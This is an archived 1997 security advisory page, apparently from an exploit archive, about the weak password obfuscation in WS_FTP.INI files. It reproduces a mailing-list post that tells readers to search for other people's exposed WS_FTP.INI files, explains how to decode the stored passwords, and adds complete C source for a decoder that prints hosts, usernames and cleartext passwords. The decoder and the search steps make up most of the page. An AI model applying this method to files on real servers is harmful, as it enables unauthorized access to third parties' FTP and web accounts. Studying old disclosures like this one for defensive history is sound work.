Trivial "encryption" (obfuscation) in ws_ftp.ini

Summary
Description:WS_FTP offers the facility for morons to store their ftp password to remote systems. It keeps this information in ws_ftp.ini in obfuscated form which is easy to decode. Additionally, some idiots have their ws_ftp.ini (including passwords) available on public internet ftp sites.
Author:Milosch Meriac <anotherPI@studbox.uni-stuttgart.de>
Compromise:Obtain cleartext passwors from ws_ftp.ini files
Vulnerable Systems:People who save passwords w/ws_ftp and keep the .ini file where it is accessible to others.
Date:9 August 1997
Notes:I have appended a simple program to "decrypt" the ini file.
Details


Date: Sat, 09 Aug 1997 12:59:27 +0200
From: Milosch Meriac <anotherPI@studbox.uni-stuttgart.de>
To: best-of-security@cyber.com.au
Subject: BoS: WS_FTP.INI Security hole.


hi,

i have discovered the following bug/security hole:

Step 1.: find some WS_FTP.INI files Worldwide using 
http://ftpsearch.ntnu.no/ftpsearch?query=ws_ftp.ini&doit=Search&type=Case+in
sensitive+substring+search&hits=5000&matches=&hitsprmatch=&limdom=&limpath=&
f1=Count&f2=Mode&f3=Size&f4=Date&f5=Host&f6=Path&header=none&sort=date&trlen
=20

(sorted by Date & Size)


Step 2.: approximately 30% if these Files are containing encrypted
Passords for WWW/FTP servers plus Usernames & Hosts;
   ---->75% of these Passwords are valid !!!


example: Content of a WS_FTP.INI-file:
  [Gate]
  HOST=ftp.gate.net
  UID=ftp
  PWD=616F71717D727B7A48
  LOCDIR=D:\
  DIR=/

(PWD=<encrypted Password stands here>)


Step 3.: decrypt Passwords:
The Encryption Method used in WS_FTP is _extremely_ weak ! the Password
is converted (ASCII conforming) to Hex-Numbers (2 Digits)... if a Digit
is at position N , then N is added to this Digit ---> thats all !
(The passwort mentioned in the above example is anonymus@)



How To Check if you are vulerable:

Scan your whole Website for the File "WS_FTP.INI" and ensure that this
File ist Locked for all Users expect of the Owner !

Seldom this also works with
  - EUDORA.INI 
  - PMAIL.INI (Pegasus Mail)
  - prefs.js (Netscape)
  - other INI/etc.-files (andere INI/etc.-Dateien)

_All_ files/programs mentioned above have _extremely_weak_ encryption-schemes
schemes... please check your Website !




-milosch meriac


---------
HomePage: http://wwwcip.rus.uni-stuttgart.de/~tky20848/
     PGP: http://wwwcip.rus.uni-stuttgart.de/~tky20848/PGP/anotherpi.key
 


Date: Mon, 11 Aug 1997 06:02:13 +0700
From: JeBe <jebe@STUDENTS.ITB.AC.ID>
To: BUGTRAQ@NETSPACE.ORG
Subject: Program To decrypt password in ws_ftp.ini

/*      This Program is freely distributed as long you not removed
        this comment.
        It's used to decrypt password on ini file, specially on ws_ftp.ini

        Written by
                JeBe Budianto, Electricall Engineering ITB
                E-Mail: jebe@students.itb.ac.id
                        jebe@EE.ITB.ac.id
        Tested on FreeBSD 2.1.5
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char    password[100];

void extract(void)
{
        int h,i,j,k,l;
        char m[2],n[2];
        char ch;

        i=4;h=0;
        m[1]=0;
        n[1]=0;

        if(password[i]=='V') i=5;
        while((password[i] != '\r'))
        {
                if(password[i]=='\n')
                {       printf("\n");
                        exit(0);
                }

                m[0]=password[i];i++;
                n[0]=password[i];i++;

                if(isdigit(m[0]))
                {       k=atoi(m);
                }
                else
                {       ch=tolower(m[0]);
                        switch(ch)
                        {       case 'a' : k=10;break;
                                case 'b' : k=11;break;
                                case 'c' : k=12;break;
                                case 'd' : k=13;break;
                                case 'e' : k=14;break;
                                case 'f' : k=15;
                        }
                }

                if(isdigit(n[0]))
                {       l=atoi(n);
                }
                else
                {       ch=tolower(n[0]);
                        switch(ch)
                        {       case 'a' : l=10;break;
                                case 'b' : l=11;break;
                                case 'c' : l=12;break;
                                case 'd' : l=13;break;
                                case 'e' : l=14;break;
                                case 'f' : l=15;
                        }
                }
                k=(k*16)+l-h;
                h++;
                printf("%c",k);
        }
        printf("\n");
}


void main(int argc,char **argv)
{       FILE    *fp;
        char    *sp;
        int     counter,complete;
        char    buff01[100],host[100],nama[100],namafile[100];

        printf("==============================================\n");
        printf("|  Syntax:     ProgramName IniFileName       |\n");
        printf("|  Written by  jebe@students.itb.ac.id       |\n");
        printf("==============================================\n");

        if(argc==1)
        {       printf("Use default ini file WS_FTP.INI\n");
                strcpy(namafile,"WS_FTP.INI");
        }
        else
        {       strcpy(namafile,argv[1]);
        }

        fp=fopen(namafile,"r");
        if(fp==NULL)
        {       printf("There's no ini file\n");
                exit(0);
        }

        sp=fgets(buff01,sizeof(buff01),fp);
        counter=1;

        while(sp != NULL)
        {
                if((buff01[0]=='H' && buff01[1]=='O' && buff01[2]=='S' && buff01[3]=='T'))
                {       strcpy(host,buff01);
                        complete=1;
                }

                if((buff01[0]=='U' && buff01[1]=='I' && buff01[2]=='D'))
                {       strcpy(nama,buff01);
                        complete++;
                }

                if((buff01[0]=='P' && buff01[1]=='W' && buff01[2]=='D'))
                {       strcpy(password,buff01);
                        complete++;
                }

                if(complete==3)
                {       if(( nama[4]=='f' && nama[5]=='t' && nama[6]=='p') ||  (nama[4]=='a' && nama[5]=='n' && nama[6]=='o' && nama[7]=='n' && nama[8]=='y' && nama[9]=='m' && nama[10]=='o' && nama[11]=='u' && nama[12]=='s'))
                        {}
                        else
                        {       printf("%s",host);
                                printf("%s",nama);
                                printf("Password = ");
                                extract();
                        }
                }
                sp=fgets(buff01,sizeof(buff01),fp);
        }
        fclose(fp);
}

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]